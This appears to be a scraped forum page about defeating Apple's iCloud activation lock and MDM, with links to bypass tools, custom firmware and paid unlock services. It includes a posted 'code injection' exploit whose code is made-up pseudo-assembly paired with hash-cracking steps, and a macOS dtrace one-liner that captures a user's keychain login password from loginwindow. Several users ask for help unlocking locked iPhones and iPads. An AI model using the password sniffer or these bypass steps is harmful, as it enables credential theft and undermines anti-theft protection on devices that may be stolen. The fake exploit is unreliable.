iOS FORUM - ICLOUD - UNLOCK - JAILBREAK - HACKS
  • Announcements

• myicloud

Apple release fist beta for iOS11.4   04/01/2018

Apple release fist beta for iOS11.4 Download iOS 11.4 Beta1 developers version https://idevicehacks.com/download-ios-11-4-beta1-for-developers/
    • myicloud

Bug MDM bypass (Mobile Device Management)   04/01/2018

Bug MDM bypass (Mobile Device Management) still works on ios11.3 its the best MDM remover because its FREE Link: https://myicloud.info/new-ios11-bug-mdm-bypass-mobile-device-management/ #mdm #apple #ios113 #iphone #ipad #ipod #ios11 #bypass #icloud #freetools #ios11bug
    • myicloud

Project to Reprogram the iphone NAND Flash from scratch and successfully done:   04/12/2018

Project to Reprogram the iphone NAND Flash from scratch and successfully done: a video you must watch https://myicloud.info/reflash-iphone-chip-project-wl/   #icloud #icloudbypass #unlock #iphone

Please fill free to join our group, we all need is people experience and successful methods to remove or bypass icloud using jailbreak.

with this method, you will need jailbreak your iphone ipad or ipod first. Not all iOS are possible to jailbreak ,

We do not help people who are not the legitimate owners of the devices.

We do not help people who are not the legitimate owners of the equipment.

We do not help people who are not the legitimate owners of the equipment.

Local]Apple iCloud exploit, code injection bypass icloud, activate new iphone

iTunes and iOS 7.x.x-8.x.2 code injection by #cehov RST
Platform: Local iTunes, iOS 7 to 8.1.2 remote: iOS
Affected: All Apple devices that run iTunes 12.1.0.71, all iPhones , all iPad's
Type: software injection, privilege escalation, software and hardware activation
Date of begin: 06 feb 2015

Code:
Code to inject in iTunes.exe ans second iTunes.dll:
BOF:256008X00321 SYMSTATUSREADY
MOV: 006100x00a123
MOV 005432XUNACTIVATED 002345;
JUMP 0X23643;

Use what hex injector you want to inject the code
then unplug your apple device and restart iTunes
Choose Setup new iphone in iTunes and next
fast start wireshark and listen for a hash key
take the key and decrypt it with Hashcat, you will gain the iCloud acc. privileges.
Have fun RST !

seems this just run on 32 bit systems .... i tried with other Java and all, but just get error by starting.. Java Fail , can not start 32 bit version on AMD 64 System Build. but i don´t want downgrade my system.. so for iPhone 4 solutions something new that is running on 64 bit systems? ??? 

Ich habe ein Ipad 3 mit Icloud sperre! Was kann ich tun?????

I have an Ipad 3 lock with iCloud! What do I do ?????

Pleace can Help mi ??? :(

@RUBO - Also Bypass Methoden im Internet egal was derzeit so gezeigt wird - GANZ Klar Finger von lassen. nichts ist ausgereift, Funktioniert nur halb oder gar nicht. Ebenfalls hast dein Rechner  voller Vieren oder anderen dreck! - Als Selbsttester mein Test Laptop innerhalb von 3 Monaten 5 mal neu Installiert :D 

Ich würde ein Service nehmen der dir das vie IMEI Service entfernt - DA AUCH VORSICHTIG SEIN!!! Habe da auch schon einige getestet!

derzeit zu empfehlen! 

emergencyunlocks.com  -Dort bist mit sicheren 71 Euro ( 75$ - Wechselkurs durch die Kriegsstimmung und Wirtschaftsstimmung in Europa am schwanken ) 

Zahlung einfach via PayPal und 100% Geld zurück Garantie wenns nicht klappt!

Schaue auch im Unterforum - 100 % CONFIRMED nach neuen Möglichkeiten oder IMEI Anbietern 

hi,  

I am looking for a Iphone 5c icloud bypass? The iphone is running ios 8.0.2. I haven't had any luck finding any real methods to bypass. Please comment below if anyone has found any bypasses. Thank you   

password sniffer 

MAC OSx

password sniffer in 138 chars

how to get a password after root exploit

sudo dtrace -n 'pid$target::SecKeychainLogin:entry{trace(copyinstr(uregs[R_ECX]));}' -p $(ps -A | grep -m1 loginwindow | awk '{print $1}')

i will let here a temporary link to test a custom ipsw for 4S , this is decrypted and edited files hope it works for you test it 

put in DFU mode start tinyumbrella server restore 4S with this 

DOWNLOAD IPSW CUSTOM 4S IOS 8.3

can you tell me more about this method

i have to try it on my  iphone 4s ios 8.3 and 7.1.2

Hi there got an iphone4s from someone bought for my g/f xmas stuck with is apple id cloud things cant remmber his password ive tried to reformat it but just get stuck at activation code any help to restore this iphone4sat alll 

I got a iPad air 2 activation locked.  It was restored by someone who hadn't read enough (Me) now its stuck on that activation screen.   I'm here to learn and maybe i'll be able to help somebody in the future when I learn enough, but for now I'm looking for help.  I understand that doulci is a fake?  It seemed to have the right ideal using a man-the-middle attack with the server's having the right cert's.  For some reason I could never get the script to run on my server (OS X ) was gonna try on a windows machine but then I read it was a fake.  Any help would be greatly appreciated .

Hi , I'm working on a script in perl , which runs on Linux , I need the data of an ipad3,1 unlocked , to verify that it works , because it is the device that I have .
If it works, i can do the same with other ipads which already I have an unlocked data . 
To finish the script (at least for ipads ) and be able to give the link to download
I just need this:

<dict>
<key>ActivationInfoComplete</key>
<true/>
<key>ActivationInfoXML</key>
<data>
(BASE64 DATA)
</data>
<key>FairPlayCertChain</key>
<data>
(BASE64 DATA)
</data>